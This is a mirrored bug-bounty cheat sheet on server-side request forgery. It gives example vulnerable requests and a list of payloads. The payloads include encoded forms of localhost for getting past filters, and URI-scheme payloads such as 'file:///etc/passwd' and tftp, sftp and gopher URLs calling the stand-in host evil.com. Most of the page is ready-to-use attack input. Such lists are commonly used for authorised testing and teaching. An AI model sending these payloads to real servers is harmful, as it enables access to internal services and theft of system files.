mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
1.6 KiB
1.6 KiB
Server Side Request Forgery (SSRF)
Introduction
Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server
Where to find
Usually it can be found in the request that contain request to another url, for example like this
POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com
urlApi=http://192.168.1.1%2fapi%2f&id=1
or
GET /image?url=http://192.168.1.1/
Host: example.com
How to exploit
- Basic payload
http://127.0.0.1:1337
http://localhost:1337
- Hex encoding
http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
- Octal encoding
http://127.0.0.1 -> http://0177.0.0.01
- Dword encoding
http://127.0.0.1 -> http://2130706433
- Mixed encoding
http://127.0.0.1 -> http://0177.0.0.0x1
- Using URL encoding
http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
- Using IPv6
http://0000::1:1337/
http://[::]:1337/
- Using bubble text
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
Use this https://capitalizemytitle.com/bubble-text-generator/
How to exploit (URI Scheme)
- File scheme
file:///etc/passwd
- Dict scheme
dict://127.0.0.1:1337/
- FTP scheme
ftp://127.0.0.1/
- TFTP scheme
tftp://evil.com:1337/test
- SFTP scheme
sftp://evil.com:1337/test
- LDAP scheme
ldap://127.0.0.1:1337/
- Gopher scheme
gopher://evil.com/_Test%0ASSRF